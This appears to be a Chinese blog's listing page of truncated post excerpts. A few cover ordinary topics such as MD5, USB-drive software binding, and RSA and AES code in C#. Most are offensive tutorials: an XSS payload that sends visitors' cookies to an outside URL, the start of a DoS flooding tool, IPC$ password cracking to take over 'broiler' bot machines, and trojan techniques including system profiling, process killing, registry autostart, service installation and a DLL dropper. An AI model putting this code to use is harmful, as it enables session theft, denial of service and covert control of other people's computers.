摘要:
MD5的全称是Message-Digest Algorithm 5,在90年代初由MIT的计算机科学实验室和RSA Data Security Inc发明,经MD2、MD3和MD4发展而来。 MD5将任意长度的“字节串”变换成一个128bit的大整数,并且它是一个不可逆的字符串变换算法,换句话说就是,即使你看到源程序和算法描述,也无法将一个MD5的值变换回原始的字符串,从数学原理上说,是因为原始的字符串有无穷多个,这有点象不存在反函数的数学函数。 MD5的典型应用是对一段Message(字节串)产生fingerprint(指纹),以防止被“篡改”。举个例子,你将一段话写在一个叫 ... 阅读全文
摘要:
大家知道xss攻击最有效的方式就是盗取cookie值。通过盗取cookie值可以进入后台从法客搬过来的~JS: document.write(''); function get(url) { var obj = document.getElementById("get"); obj.src = url; } var u="http:// www.2cto.com /1.php?msg="+escape(document.title)+"|"+document.cookie+"|"+escape(do 阅读全文
摘要:
利用U盘进行软件加密的方法 一般的U盘不具备加密的功能,虽然U盘和加密狗外形有一些相似,但是内部完全不一样的,U盘只是一个存储器芯片和简单的附属电路,而现在的智能卡加密狗都具有一个单独的CPU或者加密芯片,可以执行相当复杂的加密算法。 有的软件开发商有这样一种需求,就是使用U盘发布软件的同时,想要节约成本,防止U盘中的软件被复制,但又不想再购买昂贵的加密狗,因此想要把软件绑定在U盘上执行,当U盘拔下来的时候,软件就不能正常运行,和我先前介绍的绑定硬件指纹相似,使用绑定U盘的方式加密软件。 在对软件安全不是特别在意的情况下,可以在软件中采用绑定U盘内部ID的方式来实现这种加密,先使用程序... 阅读全文
摘要:
第一步产生密钥类 CreateKeyView Codeusing System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Security.Cryptography; using System.IO;namespace RSA { /// /// 创建公钥和私钥 /// public static class CreateKey { #region GetPublicKey /// ... 阅读全文
摘要:
由于最近在项目中用到,之前在网上找了好多,来来回回,终于整出来了。 贴出来以后用起来方便 C# [csharp] view plaincopyprint? #region AES加解密 /// ///AES加密(加密步骤) ///1,加密字符串得到2进制数组; ///2,将2禁止数组转为16进制; ... 阅读全文
摘要:
#include #include #define MAXBUFLEN 20480 #define HTTPADDLEN 50 #define TIMEWAIT 2000 #pragma comment(lib,"ws2_32.lib")SOCKET Global[1000]; DWORD WINAPI Proxy( LPVOID pSocket); int ParseHttpRequest(char * SourceBuf,int DataLen,void * ServerAddr); int main(int argc,char * argv[]) { ... 阅读全文
摘要:
// resource.h#define RC_BINARYTYPE 256#define ID_MAGICDEL_DLL 100 DLL文件: #include #include#include "resource.h" void WriteResourceToFile(char const *filename){ HINSTANCE hInstance=GetModuleHandle(NULL); HRSRC hResInfo = FindResource(hInstance, MAKEINTRESOURCE(ID_MAGICDEL_DLL), ... 阅读全文
摘要:
DOS基本原理相信大家都已经很熟悉了,DOS工具大家也用的很熟悉.在群里 经常有人说什么时候去DOS什么东西. 现在我们就自己编写一个DOS工具. #include #include #include #pragma comment(lib,"ws2_32.lib")#define SEQ 0x28376839 int threadnum,maxthread,port;char *DestIP; //目标IP void display(void) // 定义状态提示函数 { static int play=0;// 进度条 char *plays[12]= { " 阅读全文
摘要:
#include #include#include //计时需要用到的头文件#pragma comment(lib,"ws2_32.lib") #include //计时需要用到的头文件clock_t start,end; //程序运行的起始和结束时间float costtime; //程序耗时void usage(void){printf("\tusage: tcpscan RemoteIP StartPort-EndPort\n");printf("\tExample: tcpscan 192.168.1.1 80-100\n") 阅读全文
摘要:
我们要取得肉鸡的控制权,首先必须有Administrator权限,获得权限的途径很多都是通过IPC$破解来获得用户密码. 我们看一下代码: #include #include #include #pragma comment (lib, "Mpr.lib")#pragma comment (lib, "Netapi32.lib") void getuser(char *); void main( int argc, char *argv[ ] ){ //空用户名和密码DWORD ret;char username[100] = "", 阅读全文
摘要:
木马程序一般都能获得系统详细信息,下面的代码获得计算机名,内存容量,驱动器类型: #include#include void GetSysInfo(); DWORD GetOS() { OSVERSIONINFO os; os.dwOSVersionInfoSize=sizeof(OSVERSIONINFO); GetVersionEx(&os); switch(os.dwPlatformId) { case VER_PLATFORM_WIN32_WINDOWS: return VER_PLATFORM_WIN32_WINDOWS; case VER_PLATFORM_WIN32_NT 阅读全文
摘要:
第十节 查杀进程 我们在编写木马和后门程序时,列出和查杀进程是非常重要的.列出进程我们使用palist函数:void pslist(void) { HANDLE hProcessSnap = NULL; PROCESSENTRY32 pe32= {0}; hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (hProcessSnap == (HANDLE)-1) { printf("\nCreateToolhelp32Snapshot() failed:%d",GetLastError()); 阅读全文
摘要:
第九节 进程创建 我们使用CreateProcess来创建进程.我们先看一下函数原形:BOOL CreateProcess(LPCTSTR LPApplicationName, //可执行模块名 LPTSTR lpCommandLine, //命令字符串 LPSECURITY_ATTRIBUTES lpProcessAttributes, //线程安全属性 LPSECURITY_ATTRIBUTES lpThr... 阅读全文
摘要:
第七节 程序从注册表自启动 先向大家介绍能让WINDOWS自动启动的2个文件和8个注册键1: 当前用户专用的启动文件夹 将快捷方式放入WINDOWS的用户启动文件夹中. 路径:系统盘:\Document and Settings\\"开始"\程序\启动2:所有用户的启动文件夹 路径:系统盘:\Document and Settings\ALL USER\"开始"\程序\启动以下是注册键,均可以通过注册表直接搜索得到3:LOAD注册键4:USERINIT注册键5:EXPLORER\RUN注册键6:RUNSERVICESONCE注册键7:RUNSERVICE 阅读全文
摘要:
先介绍一下什么是NT服务,实际上就是一个可以在系统启动时自动在一定身份下启动的,伴随着系统长期存在的进程. 一个NT服务有三部分构成: 1:Service Control Manager(SCM) 每个WIN NT/2K都有一个SCM,他存在于Service.exe中. 2:服务本身 一个服务拥有能从SCM受到信号和命令所必需的特殊代码,并能够在处理后将他的状态返回SCM. 3:Service Control Dispatcher(SCP) 他是一个拥有用户截面,允许用户开始,暂停,继续,并且控制已经安装在计算机上作为服务运行的WIN32 应用程序下面我们来看编写一个NT... 阅读全文